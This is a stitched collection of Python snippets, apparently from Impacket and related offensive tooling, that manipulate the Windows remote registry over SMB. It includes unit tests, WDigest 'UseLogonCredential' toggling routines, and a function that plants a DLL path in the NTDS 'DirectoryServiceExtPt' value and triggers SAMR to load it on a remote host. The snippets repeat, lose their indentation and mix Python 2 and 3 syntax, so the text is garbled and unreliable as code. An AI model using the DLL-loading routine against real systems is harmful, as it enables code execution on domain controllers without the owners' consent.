def disable(self):
remoteOps = RemoteOperations(self.smbconnection, self.doKerb)
remoteOps.enableRegistry()
self.rrp = remoteOps._RemoteOperations__rrp
if self.rrp is not None:
ans = rrp.hOpenLocalMachine(self.rrp)
regHandle = ans['phKey']
ans = rrp.hBaseRegOpenKey(self.rrp, regHandle, 'SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest')
keyHandle = ans['phkResult']
try:
rrp.hBaseRegDeleteValue(self.rrp, keyHandle, 'UseLogonCredential\x00')
except:
self.logger.success('UseLogonCredential registry key not present')
try:
remoteOps.finish()
except:
pass
return
try:
#Check to make sure the reg key is actually deleted
rtype, data = rrp.hBaseRegQueryValue(self.rrp, keyHandle, 'UseLogonCredential\x00')
except DCERPCException:
self.logger.success('UseLogonCredential registry key deleted successfully')
try:
remoteOps.finish()
except:
pass
def disable(self):
remoteOps = RemoteOperations(self.smbconnection, self.doKerb)
remoteOps.enableRegistry()
self.rrp = remoteOps._RemoteOperations__rrp
if self.rrp is not None:
ans = rrp.hOpenLocalMachine(self.rrp)
regHandle = ans['phKey']
ans = rrp.hBaseRegOpenKey(
self.rrp, regHandle,
'SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest'
)
keyHandle = ans['phkResult']
rrp.hBaseRegDeleteValue(self.rrp, keyHandle,
'UseLogonCredential\x00')
try:
#Check to make sure the reg key is actually deleted
rtype, data = rrp.hBaseRegQueryValue(self.rrp, keyHandle,
'UseLogonCredential\x00')
except DCERPCException:
self.logger.success(
'UseLogonCredential registry key deleted successfully')
try:
remoteOps.finish()
except:
pass
def start(remoteName, remoteHost, username, password, dllPath):
winreg_bind = r'ncacn_np:445[\pipe\winreg]'
hRootKey = None
subkey = None
rrpclient = None
print("[*] Connecting to remote registry")
try:
rpctransport = transport.SMBTransport(remoteHost, 445, r'\winreg',
username, password, "", "", "",
"")
except (Exception) as e:
print("[x] Error establishing SMB connection: %s" % e)
return
try:
# Set up winreg RPC
rrpclient = rpctransport.get_dce_rpc()
rrpclient.connect()
rrpclient.bind(rrp.MSRPC_UUID_RRP)
except (Exception) as e:
print("[x] Error binding to remote registry: %s" % e)
return
print("[*] Connection established")
print(
"[*] Adding new value to SYSTEM\\CurrentControlSet\\Services\\NTDS\\DirectoryServiceExtPtr"
)
try:
# Add a new registry key
ans = rrp.hOpenLocalMachine(rrpclient)
hRootKey = ans['phKey']
subkey = rrp.hBaseRegOpenKey(
rrpclient, hRootKey, "SYSTEM\\CurrentControlSet\\Services\\NTDS")
rrp.hBaseRegSetValue(rrpclient, subkey["phkResult"],
"DirectoryServiceExtPt", 1, dllPath)
except (Exception) as e:
print("[x] Error communicating with remote registry: %s" % e)
return
print("[*] Registry value created, DLL will be loaded from %s" % (dllPath))
trigger_samr(remoteHost, username, password)
print("[*] Removing registry entry")
try:
rrp.hBaseRegDeleteValue(rrpclient, subkey["phkResult"],
"DirectoryServiceExtPt")
except (Exception) as e:
print("[x] Error deleting from remote registry: %s" % e)
return
print("[*] All done")
def test_hBaseRegCreateKey_hBaseRegSetValue_hBaseRegDeleteKey(self):
dce, rpctransport, phKey = self.connect()
resp = rrp.hOpenClassesRoot(dce)
resp.dump()
regHandle = resp['phKey']
resp = rrp.hBaseRegCreateKey(dce, regHandle, 'BETO\x00')
resp.dump()
phKey = resp['phkResult']
try:
resp = rrp.hBaseRegSetValue(dce, phKey, 'BETO2\x00', rrp.REG_SZ,
'HOLA COMO TE VA\x00')
resp.dump()
except Exception as e:
print(e)
type, data = rrp.hBaseRegQueryValue(dce, phKey, 'BETO2\x00')
#print data
resp = rrp.hBaseRegDeleteValue(dce, phKey, 'BETO2\x00')
resp.dump()
resp = rrp.hBaseRegDeleteKey(dce, regHandle, 'BETO\x00')
resp.dump()
self.assertTrue('HOLA COMO TE VA\x00' == data)
def test_hBaseRegCreateKey_hBaseRegSetValue_hBaseRegDeleteKey(self):
dce, rpctransport, phKey = self.connect()
resp = rrp.hOpenClassesRoot(dce)
resp.dump()
regHandle = resp['phKey']
resp = rrp.hBaseRegCreateKey(dce, regHandle, 'BETO\x00')
resp.dump()
phKey = resp['phkResult']
try:
resp = rrp.hBaseRegSetValue(dce, phKey, 'BETO2\x00', rrp.REG_SZ, 'HOLA COMO TE VA\x00')
resp.dump()
except Exception as e:
print e
type, data = rrp.hBaseRegQueryValue(dce, phKey, 'BETO2\x00')
#print data
resp = rrp.hBaseRegDeleteValue(dce, phKey, 'BETO2\x00')
resp.dump()
resp = rrp.hBaseRegDeleteKey(dce, regHandle, 'BETO\x00')
resp.dump()
self.assertTrue( 'HOLA COMO TE VA\x00' == data )
def test_hBaseRegCreateKey_hBaseRegSetValue_hBaseRegDeleteKey(self):
dce, rpctransport = self.connect()
resp = rrp.hOpenClassesRoot(dce)
resp.dump()
regHandle = resp['phKey']
resp = rrp.hBaseRegCreateKey(dce, regHandle, self.test_key)
resp.dump()
phKey = resp['phkResult']
try:
resp = rrp.hBaseRegSetValue(dce, phKey, self.test_value_name,
rrp.REG_SZ, self.test_value_data)
resp.dump()
except Exception as e:
print(e)
type, data = rrp.hBaseRegQueryValue(dce, phKey, self.test_value_name)
resp = rrp.hBaseRegDeleteValue(dce, phKey, self.test_value_name)
resp.dump()
resp = rrp.hBaseRegDeleteKey(dce, regHandle, self.test_key)
resp.dump()
self.assertEqual(self.test_value_data, data)
def wdigest_disable(self, context, smbconnection):
remoteOps = RemoteOperations(smbconnection, False)
remoteOps.enableRegistry()
if remoteOps._RemoteOperations__rrp:
ans = rrp.hOpenLocalMachine(remoteOps._RemoteOperations__rrp)
regHandle = ans['phKey']
ans = rrp.hBaseRegOpenKey(
remoteOps._RemoteOperations__rrp, regHandle,
'SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest'
)
keyHandle = ans['phkResult']
try:
rrp.hBaseRegDeleteValue(remoteOps._RemoteOperations__rrp,
keyHandle, 'UseLogonCredential\x00')
except:
context.log.success(
'UseLogonCredential registry key not present')
try:
remoteOps.finish()
except:
pass
return
try:
#Check to make sure the reg key is actually deleted
rtype, data = rrp.hBaseRegQueryValue(
remoteOps._RemoteOperations__rrp, keyHandle,
'UseLogonCredential\x00')
except DCERPCException:
context.log.success(
'UseLogonCredential registry key deleted successfully')
try:
remoteOps.finish()
except:
pass
class RRPTests(unittest.TestCase):
def connect(self):
rpctransport = transport.DCERPCTransportFactory(self.stringBinding)
if len(self.hashes) > 0:
lmhash, nthash = self.hashes.split(':')
else:
lmhash = ''
nthash = ''
if hasattr(rpctransport, 'set_credentials'):
# This method exists only for selected protocol sequences.
rpctransport.set_credentials(self.username, self.password,
self.domain, lmhash, nthash)
dce = rpctransport.get_dce_rpc()
#dce.set_auth_level(RPC_C_AUTHN_LEVEL_PKT_INTEGRITY)
dce.connect()
dce.bind(rrp.MSRPC_UUID_RRP, transfer_syntax=self.ts)
resp = rrp.hOpenLocalMachine(
dce,
MAXIMUM_ALLOWED | rrp.KEY_WOW64_32KEY | rrp.KEY_ENUMERATE_SUB_KEYS)
return dce, rpctransport, resp['phKey']
def test_OpenClassesRoot(self):
dce, rpctransport, phKey = self.connect()
request = rrp.OpenClassesRoot()
request['ServerName'] = NULL
request['samDesired'] = MAXIMUM_ALLOWED
resp = dce.request(request)
resp.dump()
def test_OpenCurrentUser(self):
dce, rpctransport, phKey = self.connect()
request = rrp.OpenCurrentUser()
request['ServerName'] = NULL
request['samDesired'] = MAXIMUM_ALLOWED
resp = dce.request(request)
resp.dump()
def test_OpenLocalMachine(self):
dce, rpctransport, phKey = self.connect()
request = rrp.OpenLocalMachine()
request['ServerName'] = NULL
request['samDesired'] = MAXIMUM_ALLOWED
resp = dce.request(request)
resp.dump()
def test_OpenPerformanceData(self):
dce, rpctransport, phKey = self.connect()
request = rrp.OpenPerformanceData()
request['ServerName'] = NULL
request['samDesired'] = MAXIMUM_ALLOWED
resp = dce.request(request)
resp.dump()
def test_OpenUsers(self):
dce, rpctransport, phKey = self.connect()
request = rrp.OpenUsers()
request['ServerName'] = NULL
request['samDesired'] = MAXIMUM_ALLOWED
resp = dce.request(request)
resp.dump()
def test_BaseRegCloseKey(self):
dce, rpctransport, phKey = self.connect()
request = rrp.BaseRegCloseKey()
request['hKey'] = phKey
resp = dce.request(request)
resp.dump()
def test_hBaseRegCreateKey_hBaseRegSetValue_hBaseRegDeleteKey(self):
dce, rpctransport, phKey = self.connect()
resp = rrp.hOpenClassesRoot(dce)
resp.dump()
regHandle = resp['phKey']
resp = rrp.hBaseRegCreateKey(dce, regHandle, 'BETO\x00')
resp.dump()
phKey = resp['phkResult']
try:
resp = rrp.hBaseRegSetValue(dce, phKey, 'BETO2\x00', rrp.REG_SZ,
'HOLA COMO TE VA\x00')
resp.dump()
except Exception, e:
print e
type, data = rrp.hBaseRegQueryValue(dce, phKey, 'BETO2\x00')
#print data
resp = rrp.hBaseRegDeleteValue(dce, phKey, 'BETO2\x00')
resp.dump()
resp = rrp.hBaseRegDeleteKey(dce, regHandle, 'BETO\x00')
resp.dump()
self.assertTrue('HOLA COMO TE VA\x00' == data)
def delete(self, dce, keyName):
hRootKey, subKey = self.__strip_root_key(dce, keyName)
# READ_CONTROL | rrp.KEY_SET_VALUE | rrp.KEY_CREATE_SUB_KEY should be equal to KEY_WRITE (0x20006)
if self.__options.v is None and not self.__options.va and not self.__options.ve: # Try to delete subkey
subKeyDelete = subKey
subKey = '\\'.join(subKey.split('\\')[:-1])
ans2 = rrp.hBaseRegOpenKey(dce,
hRootKey,
subKey,
samDesired=READ_CONTROL
| rrp.KEY_SET_VALUE
| rrp.KEY_CREATE_SUB_KEY)
# Should I use ans2?
try:
ans3 = rrp.hBaseRegDeleteKey(
dce,
hRootKey,
subKeyDelete,
)
except rpcrt.DCERPCException as e:
if e.error_code == 5:
#TODO: Check if DCERPCException appears only because of existing subkeys
print(
'Cannot delete key %s. Possibly it contains subkeys or insufficient privileges'
% keyName)
return
else:
raise
except Exception as e:
logging.error('Unhandled exception while hBaseRegDeleteKey')
return
if ans3['ErrorCode'] == 0:
print('Successfully deleted subkey %s' % (keyName))
else:
print('Error 0x%08x while deleting subkey %s' %
(ans3['ErrorCode'], keyName))
elif self.__options.v: # Delete single value
ans2 = rrp.hBaseRegOpenKey(dce,
hRootKey,
subKey,
samDesired=READ_CONTROL
| rrp.KEY_SET_VALUE
| rrp.KEY_CREATE_SUB_KEY)
ans3 = rrp.hBaseRegDeleteValue(dce, ans2['phkResult'],
self.__options.v)
if ans3['ErrorCode'] == 0:
print('Successfully deleted key %s\\%s' %
(keyName, self.__options.v))
else:
print('Error 0x%08x while deleting key %s\\%s' %
(ans3['ErrorCode'], keyName, self.__options.v))
elif self.__options.ve:
ans2 = rrp.hBaseRegOpenKey(dce,
hRootKey,
subKey,
samDesired=READ_CONTROL
| rrp.KEY_SET_VALUE
| rrp.KEY_CREATE_SUB_KEY)
ans3 = rrp.hBaseRegDeleteValue(dce, ans2['phkResult'], '')
if ans3['ErrorCode'] == 0:
print('Successfully deleted value %s\\%s' %
(keyName, 'Default'))
else:
print('Error 0x%08x while deleting value %s\\%s' %
(ans3['ErrorCode'], keyName, self.__options.v))
elif self.__options.va:
ans2 = rrp.hBaseRegOpenKey(dce,
hRootKey,
subKey,
samDesired=rrp.MAXIMUM_ALLOWED
| rrp.KEY_ENUMERATE_SUB_KEYS)
i = 0
allSubKeys = []
while True:
try:
ans3 = rrp.hBaseRegEnumValue(dce, ans2['phkResult'], i)
lp_value_name = ans3['lpValueNameOut'][:-1]
allSubKeys.append(lp_value_name)
i += 1
except rrp.DCERPCSessionError as e:
if e.get_error_code() == ERROR_NO_MORE_ITEMS:
break
ans4 = rrp.hBaseRegOpenKey(dce,
hRootKey,
subKey,
samDesired=rrp.MAXIMUM_ALLOWED
| rrp.KEY_ENUMERATE_SUB_KEYS)
for subKey in allSubKeys:
try:
ans5 = rrp.hBaseRegDeleteValue(dce, ans4['phkResult'],
subKey)
if ans5['ErrorCode'] == 0:
print('Successfully deleted value %s\\%s' %
(keyName, subKey))
else:
print('Error 0x%08x in deletion of value %s\\%s' %
(ans5['ErrorCode'], keyName, subKey))
except Exception as e:
print('Unhandled error %s in deletion of value %s\\%s' %
(str(e), keyName, subKey))
class RRPTests(unittest.TestCase):
def connect_scmr(self):
rpctransport = transport.DCERPCTransportFactory(
r'ncacn_np:%s[\pipe\svcctl]' % self.machine)
if len(self.hashes) > 0:
lmhash, nthash = self.hashes.split(':')
else:
lmhash = ''
nthash = ''
if hasattr(rpctransport, 'set_credentials'):
# This method exists only for selected protocol sequences.
rpctransport.set_credentials(self.username, self.password,
self.domain, lmhash, nthash)
dce = rpctransport.get_dce_rpc()
# dce.set_max_fragment_size(32)
dce.connect()
dce.bind(scmr.MSRPC_UUID_SCMR)
lpMachineName = 'DUMMY\x00'
lpDatabaseName = 'ServicesActive\x00'
desiredAccess = scmr.SERVICE_START | scmr.SERVICE_STOP | scmr.SERVICE_CHANGE_CONFIG | \
scmr.SERVICE_QUERY_CONFIG | scmr.SERVICE_QUERY_STATUS | \
scmr.SERVICE_ENUMERATE_DEPENDENTS | scmr.SC_MANAGER_ENUMERATE_SERVICE
resp = scmr.hROpenSCManagerW(dce, lpMachineName, lpDatabaseName,
desiredAccess)
scHandle = resp['lpScHandle']
return dce, rpctransport, scHandle
def connect(self):
if self.rrpStarted is not True:
dce, rpctransport, scHandle = self.connect_scmr()
desiredAccess = scmr.SERVICE_START | scmr.SERVICE_STOP | scmr.SERVICE_CHANGE_CONFIG | \
scmr.SERVICE_QUERY_CONFIG | scmr.SERVICE_QUERY_STATUS | scmr.SERVICE_ENUMERATE_DEPENDENTS
resp = scmr.hROpenServiceW(dce, scHandle, 'RemoteRegistry\x00',
desiredAccess)
resp.dump()
serviceHandle = resp['lpServiceHandle']
try:
resp = scmr.hRStartServiceW(dce, serviceHandle)
except Exception as e:
if str(e).find('ERROR_SERVICE_ALREADY_RUNNING') >= 0:
pass
else:
raise
resp = scmr.hRCloseServiceHandle(dce, scHandle)
self.rrpStarted = True
rpctransport = transport.DCERPCTransportFactory(self.stringBinding)
if len(self.hashes) > 0:
lmhash, nthash = self.hashes.split(':')
else:
lmhash = ''
nthash = ''
if hasattr(rpctransport, 'set_credentials'):
# This method exists only for selected protocol sequences.
rpctransport.set_credentials(self.username, self.password,
self.domain, lmhash, nthash)
dce = rpctransport.get_dce_rpc()
#dce.set_auth_level(RPC_C_AUTHN_LEVEL_PKT_INTEGRITY)
dce.connect()
dce.bind(rrp.MSRPC_UUID_RRP, transfer_syntax=self.ts)
resp = rrp.hOpenLocalMachine(
dce,
MAXIMUM_ALLOWED | rrp.KEY_WOW64_32KEY | rrp.KEY_ENUMERATE_SUB_KEYS)
return dce, rpctransport, resp['phKey']
def test_OpenClassesRoot(self):
dce, rpctransport, phKey = self.connect()
request = rrp.OpenClassesRoot()
request['ServerName'] = NULL
request['samDesired'] = MAXIMUM_ALLOWED
resp = dce.request(request)
resp.dump()
def test_OpenCurrentUser(self):
dce, rpctransport, phKey = self.connect()
request = rrp.OpenCurrentUser()
request['ServerName'] = NULL
request['samDesired'] = MAXIMUM_ALLOWED
resp = dce.request(request)
resp.dump()
def test_OpenLocalMachine(self):
dce, rpctransport, phKey = self.connect()
request = rrp.OpenLocalMachine()
request['ServerName'] = NULL
request['samDesired'] = MAXIMUM_ALLOWED
resp = dce.request(request)
resp.dump()
def test_OpenPerformanceData(self):
dce, rpctransport, phKey = self.connect()
request = rrp.OpenPerformanceData()
request['ServerName'] = NULL
request['samDesired'] = MAXIMUM_ALLOWED
resp = dce.request(request)
resp.dump()
def test_OpenUsers(self):
dce, rpctransport, phKey = self.connect()
request = rrp.OpenUsers()
request['ServerName'] = NULL
request['samDesired'] = MAXIMUM_ALLOWED
resp = dce.request(request)
resp.dump()
def test_BaseRegCloseKey(self):
dce, rpctransport, phKey = self.connect()
request = rrp.BaseRegCloseKey()
request['hKey'] = phKey
resp = dce.request(request)
resp.dump()
def test_hBaseRegCreateKey_hBaseRegSetValue_hBaseRegDeleteKey(self):
dce, rpctransport, phKey = self.connect()
resp = rrp.hOpenClassesRoot(dce)
resp.dump()
regHandle = resp['phKey']
resp = rrp.hBaseRegCreateKey(dce, regHandle, 'BETO\x00')
resp.dump()
phKey = resp['phkResult']
try:
resp = rrp.hBaseRegSetValue(dce, phKey, 'BETO2\x00', rrp.REG_SZ,
'HOLA COMO TE VA\x00')
resp.dump()
except Exception, e:
print e
type, data = rrp.hBaseRegQueryValue(dce, phKey, 'BETO2\x00')
#print data
resp = rrp.hBaseRegDeleteValue(dce, phKey, 'BETO2\x00')
resp.dump()
resp = rrp.hBaseRegDeleteKey(dce, regHandle, 'BETO\x00')
resp.dump()
self.assertTrue('HOLA COMO TE VA\x00' == data)
